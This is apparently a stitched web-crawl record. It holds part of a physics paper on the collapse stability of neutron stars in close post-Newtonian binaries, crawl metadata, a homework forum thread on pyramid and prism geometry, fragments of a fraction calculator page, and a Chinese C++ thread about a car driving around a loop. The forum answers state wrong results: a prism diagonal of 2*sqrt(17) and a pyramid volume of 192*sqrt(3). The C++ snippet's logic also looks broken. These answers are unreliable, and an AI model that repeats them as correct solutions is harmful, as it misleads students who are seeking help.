$$t_{\rm osc} \simeq 2\pi\left[\frac{3(\Gamma-1)M^2}{(5\Gamma-6)RI}\Big(3\Gamma - 4 - 6.75\frac{M}{R}\Big)\right]^{-1/2}, \qquad (38)$$

where $M$ is the Newtonian (rest) mass, $R$ is the Newtonian radius of the star, and

$$I = \int\rho r^2\,dV \qquad (39)$$

is the spherical mass moment. Inserting the values of $M$, $R$, and $I$ for $\Gamma = 1.4$, we find

$$t_{\rm osc} \simeq 5.5\,\rho_c^{-1/2}\Big(0.2 - 6.75\frac{M}{R}\Big)^{-1/2}. \qquad (40)$$

For model A, the compaction $M/R$ is small, and the resulting period is very close to the value that can be read off in Fig. 2. Obviously, models with a larger compaction have, in units of $\rho_c^{-1/2}$, a larger oscillation period $t_{\rm osc}$, which can also be seen in Fig. 2. At the onset of instability, $t_{\rm osc} \to \infty$. From equation (40) we therefore find that the maximum mass configuration must have a compaction $M/R \simeq 0.2/6.75 \simeq 0.03$, which is very close to that of model C.
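Two of the numbers quoted above follow from one-line evaluations; the following quick check uses only relations stated in the text (the script itself is ours).

```python
GAMMA = 1.4
n = 1.0 / (GAMMA - 1.0)             # polytropic index, n = 2.5

# Critical compaction from eq. (40): t_osc diverges when 3*Gamma-4 = 6.75*M/R
print((3.0 * GAMMA - 4.0) / 6.75)   # ~0.0296, the compaction near model C

# Scale freedom: K**(n/2) carries units of mass, so dM/M = (n/2) * dK/K
print(0.5 * n * 0.005)              # reducing K by 0.5% <-> raising M by 0.625%
```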
Leaving $K = 1$ for model C, the star oscillates stably, but reducing $K$ by only 0.5% to $K = 0.995$, the central density increases monotonically, and the star undergoes gravitational collapse. This indicates that model C is marginally stable against small perturbations, and very close to the onset of instability. This is plausible, since its proper mass is only slightly smaller than the maximum allowed mass $M_{p,\rm max}$.

For models D and E, the star monotonically expands or collapses, and never oscillates: starting with $K = 0.995$, the star collapses, and for $K = 1$, the star expands by a large factor. Obviously, for $K = 1$ the star should be in equilibrium, and neither expand nor collapse. The equilibrium is unstable, however, and even the smallest truncation error induces a growing perturbation, which must ultimately lead to gravitational collapse. Initially, this perturbation may be either an expansion or a contraction. Since the configuration is gravitationally bound, the expansion soon has to turn around and lead to gravitational collapse. We would expect an initial expansion for values of $K$ above some cutoff, and an immediate contraction below it. However, due to truncation error, the cutoff between expansion and contraction is not precisely at $K = 1$, but instead at a value slightly smaller than unity when we use 30 grid points to cover the star. Again, this value approaches unity with increasing grid resolution. This behavior establishes that models D and E are unstable to radial perturbations, which is, of course, what we expected.

We conclude that we can locate the onset of radial instability, and in particular that we can determine the maximum allowed mass of neutron stars to very high accuracy. This will be very important for determining the stability properties of binary neutron stars.

## IV Dynamical stability of stars in binary systems

In this section we present numerical results on the dynamical stability of stars in binary systems. We always assume the two stars to have equal mass, and set up initial data so that they are in a circular binary orbit. Note that for $\Gamma = 1.4$ the equation of state is sufficiently soft that there is no innermost stable circular orbit [9, 27, 7]. Therefore, we can choose arbitrarily small binary separations, and the orbit of the binary will still be stable. We choose very close binaries, in which the separation of the surfaces of the two stars is much smaller than the orbital separation. For these binaries the tidal effects are strongest, and they are therefore the most suitable configuration to study the stability against gravitational collapse of the individual stars.

We evolve three different classes of binary initial data. The first class are corotational binaries. For these configurations, self-consistent equilibrium initial data can be constructed in the post-Newtonian approximation and even in general relativity (where the stars are only in quasi-equilibrium, see [16, 7]). We denote the class of post-Newtonian strict equilibrium solutions with a subscript "a".

Figure 3: Proper mass as a function of the maximum density for each star in a corotational equilibrium binary (filled circles) and for an isolated spherical star (solid line).

In addition to corotational binaries, we would also like to study irrotational binaries because they are more realistic models for binary neutron stars. Self-consistent irrotational equilibrium binaries in Newtonian gravity have recently been constructed by Uryu and Eriguchi, and a relativistic generalization has been suggested by Bonazzola, Gourgoulhon and Marck. No numerical models are currently available for such data in a post-Newtonian approximation.
In the absence of self-consistent, tidally deformed equilibrium data, we therefore take two spherically symmetric stars, put them close together, and artificially assign an irrotational velocity profile which maintains their shape and circular orbit approximately. In order to calibrate these irrotational initial data, which are not strictly in equilibrium, we first perform simulations with a second class of corotational initial data, using spherically symmetric stars, and compare these with the self-consistent post-Newtonian equilibrium models which exist in the corotational case. For this second class, we assign a uniformly rotating velocity field

$$(u^x, u^y, u^z) = (-\Omega y,\ \Omega x,\ 0) \qquad (41)$$

to each fluid particle, where $\Omega$ is the orbital angular velocity. We denote these corotational, near-equilibrium data with a subscript "b".

Finally, the third class of initial data are irrotational, near-equilibrium models. Again, we put two spherically symmetric stars at a small separation, but now we assign an initial velocity

$$(u^x, u^y, u^z) = (0,\ \pm\Omega x_0,\ 0) \qquad (42)$$

to each fluid particle. The centers of mass of the two stars are located at $(\pm x_0, 0, 0)$. The plus sign in (42) corresponds to the star at $x = +x_0$, and vice versa. We denote this third class of initial data with a subscript "c".

In the above velocity profiles, we determine the angular velocity from Kepler's law

$$\Omega = \left(\frac{M_T}{a^3}\right)^{1/2}, \qquad (43)$$

where $M_T$ is the sum of the proper masses of the two spherical stars and $a$ is the coordinate separation between their centers of mass.

In the above velocity profiles, it would be more physical to fix the angular velocity self-consistently rather than from Kepler's law. That, however, would involve one more iteration in the preparation of the initial data, and, in our small compaction cases, would make only a negligible difference. We summarize the initial conditions for six different models, two in each class, in Table I.

Figure 4: Time evolution of $\rho_{*,\rm max}$ in the corotational equilibrium binary models Ba and Da. Solid, dotted and dashed lines denote results obtained with $N = 75$, 60, and 50 gridpoints, respectively. For model Ba, we set $K = 1$ initially. For model Da, initial values of $K$ are 1, 0.995 and 0.994 for $N = 75$; 1, 0.992 and 0.99 for $N = 60$; and 1 and 0.99 for $N = 50$. Curves with numerical labels show values of $K \ne 1$.

As in our spherical models, we must vary $K$ slightly in order to investigate the stability of the binary models. Equilibrium stars in tidal fields are tidally deformed and have a slightly smaller central density than spherical stars. Using spherical models as initial data for binaries therefore overestimates the central density, which causes the stars to expand initially. As we will see, this can be compensated for by reducing $K$.

### IV.1 Corotational equilibrium models

Following Shibata and Baumgarte et al. [7, 16], we construct self-consistent equilibrium initial data, describing two corotational binary stars in contact. In Fig. 3, we plot the proper mass of each star as a function of the central density (filled circles), and compare these values with those for spherical stars in isolation (solid line). The maximum allowed mass of binary stars is slightly larger than that of spherical stars in isolation (see the discussion below).

Figure 5: Snapshots of density contour lines and the velocity flow $(v^x, v^y)$ in the equatorial plane for model Ba. Contour lines are drawn for $\rho_*/\rho_{*0} = 10^{-0.3j}$, where $\rho_{*0}$ denotes the maximum value at $t = 0$, for $j = 0, 1, 2, \ldots, 10$. Vectors indicate the local velocity field. Time is shown in units of the orbital period $P$. See Table I for the relation between $P$ and $\rho_{\rm max,0}$.
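The three classes of initial velocity fields in eqs. (41)-(43) above are easy to state in code. The array layout and function names in this sketch are our own, and nothing here addresses the paper's separate step of constructing the matter profile.

```python
import numpy as np

# Illustrative initial velocity fields for the three classes of models.

def kepler_omega(M_T, a):
    """Eq. (43): orbital angular velocity from Kepler's law."""
    return np.sqrt(M_T / a**3)

def corotational_velocity(X, Y, Omega):
    """Eq. (41): rigid rotation about the z-axis (classes 'a' and 'b')."""
    return -Omega * Y, Omega * X, np.zeros_like(X)

def irrotational_velocity(X, Omega, x0):
    """Eq. (42): each star translates with its own center of mass at
    (+x0, 0, 0) or (-x0, 0, 0); no spin relative to distant observers."""
    uy = np.where(X > 0.0, Omega * x0, -Omega * x0)
    return np.zeros_like(X), uy, np.zeros_like(X)
```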
We show results for grid sizes $N = 40$, 50, 60, and 75, and find that our code is second order accurate. The proper mass evaluated on a grid with grid spacing $d$, $M_p(d)$, therefore scales according to

$$M_p(d) = M_0 + M_2 d^2 + O(d^3). \qquad (44)$$

Taking values for different $N$ (and hence $d$), we can eliminate the second order error term by Richardson extrapolating to $d \to 0$, which yields the value $M_0$. This is the value that we plotted in Fig. 3. In Table II we summarize these results by tabulating the masses for the different grid resolutions, together with the Richardson extrapolated value $M_0$.

Figure 6: Same as Fig. 5, except for model Da at $t = 0$. For this sequence we set $K = 0.994$ initially.

Comparing $M_0$ with $M_p$ for $N = 60$ and 75, we find deviations of only a fraction of a percent (compare Table II). This is a lower limit on the truncation error that we have to expect in the subsequent evolution.

Note that in Fig. 3, we plot the mass versus maximum density for a sequence of constant separation (namely for contact binaries). In this graph, the onset of instability need not coincide with the maximum mass configuration. Instead, the onset of instability can be located by constructing sequences of constant angular momentum (see Baumgarte et al.). However, we expect that the onset of instability is very close to the maximum mass configuration. We therefore present results for two models, one with a maximum density slightly less than that of the maximum mass model (denoted Ba, with $\rho_{\rm max,0} = 5\times10^{-5}$), and one with a maximum density slightly larger (Da, with $\rho_{\rm max,0} = 1.5\times10^{-4}$). For these two models, the orbital period is $P \simeq 48.6$ and $50.2$ in units of $\rho_{\rm max,0}^{-1/2}$ (Table I), where $\rho_{\rm max,0}$ is the maximum value of $\rho_*$ at $t = 0$.

In Fig. 4, we show the time evolution of the maximum value of $\rho_*$ ($\rho_{*,\rm max}$) for models Ba and Da. We show results for three different grid resolutions, $N = 50$, 60, and 75, where we have kept the location of the outer boundary constant. We picked the outer boundary $L$ such that each star is covered by a fixed number of grid points (see Table I).

For model Da, we also picked several different values of $K$, and marked all simulations with $K \ne 1$ accordingly in Fig. 4. Depending on $K$, these models either collapse or expand, but never oscillate stably. This indicates that they are dynamically unstable, as we expected. As in the discussion of unstable spherical models, we would expect the cutoff between initial expansion and contraction to be at $K = 1$ if we had arbitrary accuracy. This is not the case, but we again find that increasing the grid resolution makes this cutoff approach unity (compare the values of $K$ for $N = 50$, 60, and 75 in Fig. 4).

For model Ba, we only show results for $K = 1$. Obviously, this configuration oscillates stably. The oscillations are due to a slight inconsistency between the initial data and the evolution scheme. The amplitude of these oscillations decreases with increasing grid number, which shows that our method is convergent. Note that $M_p$ of this configuration is 1.250, which is marginally larger than the maximum allowed rest mass of an isolated, spherical star (compare Table II). We therefore conclude that all stars that are stable in isolation are also stable in a corotational binary. We expect that the reverse is not true: a star in a close binary can support more mass than an isolated, spherical star. Note that our results are different from those of WMM, who found that stars with masses of as much as 10% or more below the maximum allowed rest mass in isolation were destabilized in a close binary. At this level, such an effect would be discerned easily by our code, but it is not present.
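The Richardson extrapolation in eq. (44) reduces to a two-point formula, which we can check directly against the numbers in Table II (taking the grid spacing $d \propto 1/N$ at fixed outer boundary):

```python
# Eq. (44): M_p(d) = M0 + M2*d^2, so two resolutions give
#   M0 = (d1^2 * M(d2) - d2^2 * M(d1)) / (d1^2 - d2^2),  with d ~ 1/N.

def richardson(N1, M1, N2, M2):
    d1sq, d2sq = 1.0 / N1**2, 1.0 / N2**2
    return (d1sq * M2 - d2sq * M1) / (d1sq - d2sq)

# First density column of Table II:
print(richardson(60, 1.2031, 75, 1.2051))   # ~1.209, the tabulated M0
```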
In Figs. 5 and 6, we show contour lines of $\rho_*$ and the velocity field $(v^x, v^y)$ in the equatorial plane for models Ba and Da, using our finest grid resolution. For model Da we set $K = 0.994$. Note that for our adopted soft equation of state, the stars are very centrally condensed. The tidal field mostly deforms the very low density envelope, which is hardly visible in these plots. The two envelopes are pulled towards the binary companion, and in our contact cases, touch at the origin. The high density cores, however, are hardly deformed by the tidal field, and are still fairly far separated.

For model Ba, we show contours at three times corresponding to the initial condition, a little more than half an orbital period, and a little over an orbital period. It is obvious from the graphs that the two stars stably orbit each other. Note also that the velocity field remains close to being corotational, and that we do not see any evidence of the vorticity features which have been reported in the literature.

For model Da we show contours at $t = 0$ and at a time a little less than half an orbital period. It can be seen very clearly how the star contracts and collapses.

### IV.2 Corotational near-equilibrium models

We now present numerical results for our corotational near-equilibrium models. We do this to calibrate our code, and to show that our near-equilibrium models are good approximations to self-consistent equilibrium models. This justifies studying such near-equilibrium models for irrotational binaries.

Figure 7: Time evolution of $\rho_{*,\rm max}$ in the corotational, near-equilibrium binary models Bb and Db. Initially, we set $K = 0.98$ (dotted line), $K = 0.975$ (solid line) and $K = 0.97$ (dashed line) for model Bb, and $K = 0.98$ (dotted line) and $K = 0.975$ (solid line) for model Db. For models Bb and Db, the orbital period is $\sim 39$ and $46\,\rho_{\rm max,0}^{-1/2}$, respectively.

Figure 8: Same as Fig. 5, but for model Bb. For this sequence we set $K = 0.975$ initially.

For all the simulations discussed in this and the following subsection, we use a fixed numerical grid size. We adjust the outer boundary such that the radius of each star is covered with a fixed number of grid points: for the models Bb and Bc we used $L = 125$, and $L = 96$ for Db and Dc (see Table I). We construct spherical models, and place them on the grid such that their centers of mass are located at $(\pm x_0, 0, 0)$. Note that these stars are not in contact. However, the stars are not tidally deformed, and therefore the separation of the centers of mass of the two stars is slightly smaller than for the self-consistent equilibrium models. The orbital period for these binaries is $\simeq 39$ and 46 in units of $\rho_{\rm max,0}^{-1/2}$, respectively.

In Fig. 7, we show the time evolution of $\rho_{*,\rm max}$ for models Bb and Db. Dotted, solid and dashed lines denote results for $K = 0.98$, 0.975, and 0.97, respectively. As before, model Db either expands or contracts, but never oscillates stably. We again conclude that Db is dynamically unstable. Model Bb, on the other hand, exhibits stable oscillations for several different values of $K$, and we conclude that it is dynamically stable.

It is interesting to note that even with a reduced value of $K = 0.98$, model Bb initially expands, albeit stably. Only after reducing the pressure further ($K = 0.975$) is the configuration roughly in equilibrium. This can be understood quite easily, because the spherical star is not a self-consistent equilibrium solution. The tidal field tends to deform the star, which reduces the central density. Therefore, our initial data have too high a central density for their mass, and the star starts expanding.
This can be compensated for by reducing $K$ and hence the pressure. As we have argued before, reducing $K$ is equivalent to increasing the mass, and indeed this is another way of understanding why a star in a binary can support more mass than a star in isolation.

In Fig. 8, we show contour lines of $\rho_*$ and the velocity field in the equatorial plane for model Bb, where we have set $K = 0.975$. We show the configuration at three successive times. Comparing these plots with Fig. 5, one can see that the centers of mass of the two stars are closer. During the evolution, the stars lose their spherical shape and adjust to the tidal field. However, all the qualitative features are very similar to the self-consistent equilibrium simulations. In particular, the velocity field remains nearly corotational, and we do not see any evidence of the double vorticity fields as reported by WMM.

This test suggests that the spherical near-equilibrium models are very good approximations to self-consistent equilibrium configurations for the models and issues we are investigating here.

### IV.3 Irrotational near-equilibrium models

Viscosities in neutron stars are expected to be too small to bring neutron star binaries into corotation on the timescale of their evolution. Numerical models exist only in Newtonian gravity [29, 30] or in the Newtonian and post-Newtonian ellipsoidal approximation [22, 11]. We therefore adopt the spherical near-equilibrium approximation to construct initial models, which we have calibrated and found to be adequate in section IV.2 for corotational cases.

Figure 9: Time evolution of $\rho_{*,\rm max}$ in the irrotational, near-equilibrium binary models Bc and Dc. Initial values of $K$ are 0.99, 0.985 and 0.98 for model Bc, and 0.98 and 0.985 for model Dc. Solid, dotted and dashed lines denote results for $K = 0.98$, 0.985 and 0.99, respectively. The orbital period of models Bc and Dc is again $\sim 39$ and $46\,\rho_{\rm max,0}^{-1/2}$.

Figure 10: Same as Fig. 5, but for model Bc. For this sequence, we set $K = 0.99$ initially.

We again vary $K$, and choose $K = 0.99$, 0.985, and 0.98 for model Bc, and $K = 0.985$ and 0.98 for model Dc. In Fig. 9, we show the time evolution of $\rho_{*,\rm max}$ for models Bc and Dc. Dashed, dotted and solid lines denote results for $K = 0.99$, 0.985, and 0.98, respectively. As in the corotational cases, model Dc cannot be held in stable equilibrium, whereas model Bc oscillates for all these choices of $K$. Therefore, we again conclude that model Bc is dynamically stable, whereas Dc is not.

It is interesting to note that for these irrotational models, we had to reduce $K$ by a somewhat smaller amount to minimize the amplitude of oscillations in model Bc than for the corotational model Bb ($K = 0.99$ here, and $K = 0.975$ for model Bb). This can be understood very easily, because in corotational models the individual stars are spinning, and are therefore stabilized and deformed by both the tidal field and their own spin. In irrotational binaries, the stars have almost no spin (with respect to distant inertial observers), and are deformed only by the tidal field. Therefore, putting a star into an irrotational binary will reduce the central density by less than putting the same star into a corotational binary. As a consequence, we have to reduce $K$ by a smaller amount to compensate. Applying our scaling argument, this result means that an irrotational binary can support less mass than a corotational binary, but still more than a spherical star in isolation. This result is corroborated by post-Newtonian ellipsoidal models.
In Fig. 10, we show contour lines of $\rho_*$ and the velocity field in the equatorial plane for model Bc, with $K = 0.99$ initially. We show contours at three successive times. For the bulk of the matter at the core of the stars, the velocity field remains approximately irrotational, and the stars stably orbit each other. We conclude that there is no qualitative difference between corotational and irrotational binaries as far as their radial stability properties are concerned.

## V Summary

We perform post-Newtonian, dynamical simulations of close binaries in circular orbit. In particular, we study the stability of the individual stars against gravitational collapse in both corotational and irrotational systems containing stars of equal mass.

We have chosen a soft, adiabatic equation of state with $\Gamma = 1.4$, for which there is no innermost stable circular orbit, so that the binary orbit is stable even when the stars are in contact, and for which the onset of instability for a spherical star in isolation occurs at a very small value of the compaction $M/R$. We can therefore study the individual stars' stability properties in near-contact binaries, for which the tidal effects are strongest, and in a regime in which a post-Newtonian approximation is very accurate.

We do not find any crushing effect as reported by WMM. In contrast, the maximum density in both corotational and irrotational binaries is smaller than that of spherical stars in isolation. We find that stars in binaries can support more mass than in isolation. Moreover, all stars that are stable against radial perturbations in isolation will also be dynamically stable when put into a binary.

All these results are in complete agreement with, for example, the findings of Baumgarte et al. [16, 17], Flanagan, and Thorne. For the most part, their discussions rigorously address secular stability only. Several different arguments can be invoked to suggest that secularly stable binaries are also dynamically stable, but this is strictly proven only in Newtonian theory. Our dynamical calculations reported in this paper are the first to directly confirm dynamical stability, at least within our post-Newtonian approximation.

We compare, in a near-equilibrium approximation, corotational and irrotational binary models. As expected, stars in corotational binaries can support slightly more mass than in irrotational binaries, but apart from these small differences we do not find any qualitative difference in their radial stability properties. A more rigorous treatment will require the construction of post-Newtonian, irrotational equilibrium binary models for initial data.

Since our computations have been performed in nondimensional units, our results apply not only to neutron star binaries, but also to binaries of white dwarfs and supermassive stars. In fact, the equations of state of massive white dwarfs (ideal degenerate, extremely relativistic electrons) and supermassive stars (radiation thermal pressure) are closely approximated by the value of $\Gamma$ that we have adopted. These binaries may be important low frequency gravitational wave sources for future space-based gravitational wave detectors, like LISA.

###### Acknowledgements.
Numerical computations were performed on the FACOM VX/4R machine in the data processing center of the National Astronomical Observatory of Japan. M. S. wishes to express his gratitude to the University of Illinois at Urbana-Champaign for its hospitality during his stay in September, 1997, when this project was initiated.
This work was supported by a Japanese Grant-in-Aid of the Ministry of Education, Culture, Science and Sports (Nos. 08NP0801 and 09740336), and by NSF Grant AST 96-18524 and NASA Grant NAG 5-3420 at Illinois.

Table I. Initial conditions of the binary models. We tabulate the maximum density $\rho_{\rm max,0}$, the radius $R_\infty$ of a spherical star of the same rest mass in isolation, the orbital period $P$ in units of $\rho_{\rm max,0}^{-1/2}$, the nature of the initial velocity field and matter profile, and the location of the outer boundary $L$ (see text). All quantities are shown in units of $G = c = K = 1$.

| Model | $\rho_{\rm max,0}/10^{-5}$ | $R_\infty$ | $P\times\sqrt{\rho_{\rm max,0}}$ | Velocity field | Matter profile | $L$ |
|-------|------|----|------|------------|-------------|------|
| Ba | 5 | 53 | 48.6 | corotation | equilibrium | 141 |
| Da | 15 | 38 | 50.2 | corotation | equilibrium | 97.5 |
| Bb | 5 | 53 | 39.4 | corotation | spherical | 125 |
| Db | 15 | 38 | 45.9 | corotation | spherical | 96 |
| Bc | 5 | 53 | 39.4 | irrotation | spherical | 125 |
| Dc | 15 | 38 | 45.9 | irrotation | spherical | 96 |

Table II. Proper mass $M_p$ of each star in a corotational equilibrium binary for different grid resolutions. We tabulate $M_p$ versus central density for $N = 40$, 50, 60, and 75. We also list the Richardson extrapolated value $M_0$ as well as the proper mass of the spherical model in isolation with the same central density. Each column corresponds to one of four central densities along the sequence.

| Resolution | $M_p$ | $M_p$ | $M_p$ | $M_p$ |
|------------|-------|-------|-------|-------|
| $N = 40$ | 1.1954 | 1.2347 | 1.2469 | 1.2451 |
| $N = 50$ | 1.2004 | 1.2402 | 1.2526 | 1.2509 |
| $N = 60$ | 1.2031 | 1.2431 | 1.2556 | 1.2539 |
| $N = 75$ | 1.2051 | 1.2455 | 1.2581 | 1.2565 |
| $M_0$ | 1.209 | 1.250 | 1.263 | 1.261 |
| Spherical | 1.1933 | 1.2344 | 1.2482 | 1.2476 |
" ]
[ null, "https://media.arxiv-vanity.com/render-output/5912546/x1.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x2.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x3.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x4.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x5.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x6.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x7.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x8.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x9.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x10.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9099168,"math_prob":0.9726834,"size":42698,"snap":"2022-40-2023-06","text_gpt3_token_len":9603,"char_repetition_ratio":0.15568933,"word_repetition_ratio":0.03828306,"special_character_ratio":0.22640404,"punctuation_ratio":0.14535315,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98776966,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-25T01:30:35Z\",\"WARC-Record-ID\":\"<urn:uuid:9fdc1a5f-346a-4fe3-aa2a-c39f9fa02b30>\",\"Content-Length\":\"729211\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d3245710-a389-458e-b086-8260eb5be822>\",\"WARC-Concurrent-To\":\"<urn:uuid:29cc9257-6fa5-4c95-9dc1-0033a381be47>\",\"WARC-IP-Address\":\"104.21.14.110\",\"WARC-Target-URI\":\"https://www.arxiv-vanity.com/papers/gr-qc/9805026/\",\"WARC-Payload-Digest\":\"sha1:BOY2WFTFGMI5SSSNMPILGQU5OAM6FSX7\",\"WARC-Block-Digest\":\"sha1:QE5QFO74E4BHBQOIC57MVNVAVIRSJVI4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030334332.96_warc_CC-MAIN-20220925004536-20220925034536-00657.warc.gz\"}"}
https://web2.0calc.com/questions/help-pleeeease-due-tomorrow
[ "+0\n\n# Help pleeeease, due tomorrow!\n\n0\n281\n4\n\n1) Let $APQRS$ be a pyramid, where the base $PQRS$ is a square of side length $20$. The total surface area of pyramid $APQRS$ (including the base) is $600$. Let $W$, $X$, $Y$, and $Z$ be the midpoints of $\\overline{AP}$, $\\overline{AQ}$, $\\overline{AR}$, and $\\overline{AS}$, respectively. Find the total surface area of frustum $PQRSWXYZ$ (including the bases).\n\n2) In a certain rectangular prism, the total length of all the edges is $40,$ and the total surface area is $48.$ Find the length of the diagonal connecting one corner to the opposite corner.\n\n3) In a certain regular square pyramid, all of the edges have length $12$. Find the volume of the pyramid.\n\nI'm down with the flu and haven't had time to do these.. Any help is appreciated!\n\nFeb 22, 2020\n\n#1\n0\n\n4) The perimeter of the cross-sectional triangle of a prism is $45 \\text{ cm}$, the radius of the incircle of the triangle is $8 \\text{ cm}$ and the volume of the prism is $900 \\text{ cm}^3$. What is the length of the prism?\n\n5) A rectangular prism with length $l$, width $w$, and height $h$ has the property that $l + w + h = 11$ and $l^2 + w^2 + h^2 = 59$  What is the surface area of the prism?\n\n6) A square-based pyramid of height $3$ cm and base length $2$ cm is set on its square base. Water is poured through an infinitesimally small hole in the top of the pyramid to a height of $1$ cm measured from the base, and then the hole is sealed. If the pyramid is turned upside-down, what will be the new height of the water?\n\nFeb 22, 2020\n#2\n0\n\nAh these are AOPS questions.\n\nHint for nr. 3.\n\nWe know that the 4 sides are equilateral triangles, and then we can find slant height. Using pythag, we can then find the height of the pyramid.\n\nFeb 22, 2020\n#3\n0\n\n1) The surface area is 20 + 600/4 = 170.\n\n2) The length of the diagonal is 2*sqrt(17).\n\n3) The height of the pyramid works out to 4*sqrt(3), so the volume is 1/3*4*sqrt(3)*12^2 = 192*sqrt(3).\n\nFeb 25, 2020\n#4\n+1\nApr 1, 2020" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85910964,"math_prob":0.9997045,"size":1932,"snap":"2020-24-2020-29","text_gpt3_token_len":546,"char_repetition_ratio":0.15248963,"word_repetition_ratio":0.0,"special_character_ratio":0.3084886,"punctuation_ratio":0.11820331,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99974555,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-11T10:58:04Z\",\"WARC-Record-ID\":\"<urn:uuid:fd3d300a-3cfb-4a8e-962d-8d5f6a87541c>\",\"Content-Length\":\"29340\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fd963216-ca43-4f73-b478-aa56148d4bca>\",\"WARC-Concurrent-To\":\"<urn:uuid:406cfcde-1592-40d3-9c65-e15a0c97cc6e>\",\"WARC-IP-Address\":\"209.126.117.101\",\"WARC-Target-URI\":\"https://web2.0calc.com/questions/help-pleeeease-due-tomorrow\",\"WARC-Payload-Digest\":\"sha1:CYBZCGMAFTCNUYCL5ZYDKH6ODVVYL6PQ\",\"WARC-Block-Digest\":\"sha1:QU2YXQSOS3SZE5V2ICCN4BHY4SOLUWGU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655929376.49_warc_CC-MAIN-20200711095334-20200711125334-00159.warc.gz\"}"}
https://answers.everydaycalculation.com/add-fractions/30-8-plus-27-24
[ "Solutions by everydaycalculation.com\n\n1st number: 3 6/8, 2nd number: 1 3/24\n\n30/8 + 27/24 is 39/8.\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 8 and 24 is 24\n2. For the 1st fraction, since 8 × 3 = 24,\n30/8 = 30 × 3/8 × 3 = 90/24\n3. Likewise, for the 2nd fraction, since 24 × 1 = 24,\n27/24 = 27 × 1/24 × 1 = 27/24\n90/24 + 27/24 = 90 + 27/24 = 117/24\n5. 117/24 simplified gives 39/8\n6. So, 30/8 + 27/24 = 39/8\nIn mixed form: 47/8\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7510416,"math_prob":0.99844927,"size":367,"snap":"2020-10-2020-16","text_gpt3_token_len":155,"char_repetition_ratio":0.18732782,"word_repetition_ratio":0.0,"special_character_ratio":0.5095368,"punctuation_ratio":0.08888889,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99676436,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-27T03:06:57Z\",\"WARC-Record-ID\":\"<urn:uuid:5ad0bb6b-675c-4f05-ac0d-fb69c7d214c9>\",\"Content-Length\":\"8108\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2a979bd8-b405-4c2f-a6f3-440a42efa2a0>\",\"WARC-Concurrent-To\":\"<urn:uuid:858b8cdf-357f-4195-a3f3-f8d04c9fbe14>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/add-fractions/30-8-plus-27-24\",\"WARC-Payload-Digest\":\"sha1:GOL7KKXQAP3PAYFLOBHACJ5T4VNCUEKH\",\"WARC-Block-Digest\":\"sha1:K2AFRQO2CRAWRFAI5VZHFD7YK6JLH7NV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875146643.49_warc_CC-MAIN-20200227002351-20200227032351-00437.warc.gz\"}"}
https://www.wenjiangs.com/group/topic-10259.html
[ "# C++-汽车环岛一周", null, "### 发布评论", null, "### 评论(2)", null, "2017-01-09 2 楼\n\n(这里要注意应把i看作我们枚举的尾部,仔细想想。i要满足条件i<2*n(因为我们枚举时V[n-1]->V->V->....->V[n-2]是最后一条可能路径)取模是为了绕个圈)\n\nlen+=1;\n\ni+=1;往后枚举。\n\nint circle(int *d,int n,int Ld){ //Ld=L*d\nfor(int i=0;i<n;++i) //O(n)\nd[i]-=Ld;\nint len=0,sum=0;\nfor(int i=0;i<(n<<1);++i){\nsum+=d[i%n];\nif(sum<0){\nsum=0;\nlen=0;\n}\nelse\nreturn i-n+1;\n}\n}", null, "2017-01-06 1 楼\n\nV >= L * d;\nV >= V - 2 * L * d;\nV >= V + V - 3 * L * d;\nV[n-1] >= V[n-2] + V[n-3] + ... V - n * L * d;\n\nV[i] >= V[i-1] + V[i-2] + ... V - (i+1) * L * d;\n\n1497 主题\n4058 回复\n18689 人气\n\n### 相关话题", null, "" ]
[ null, "http://static.wenjiangs.com/dewen/laankicq0em-930.jpg", null, "https://asset.wenjiangs.com/images/avatars.png", null, "https://www.wenjiangs.com/wp-content/uploads/2017/05/guishu.jpg", null, "https://www.wenjiangs.com/wp-content/uploads/2017/05/1254.jpg", null, "https://asset.wenjiangs.com/11.30.png", null ]
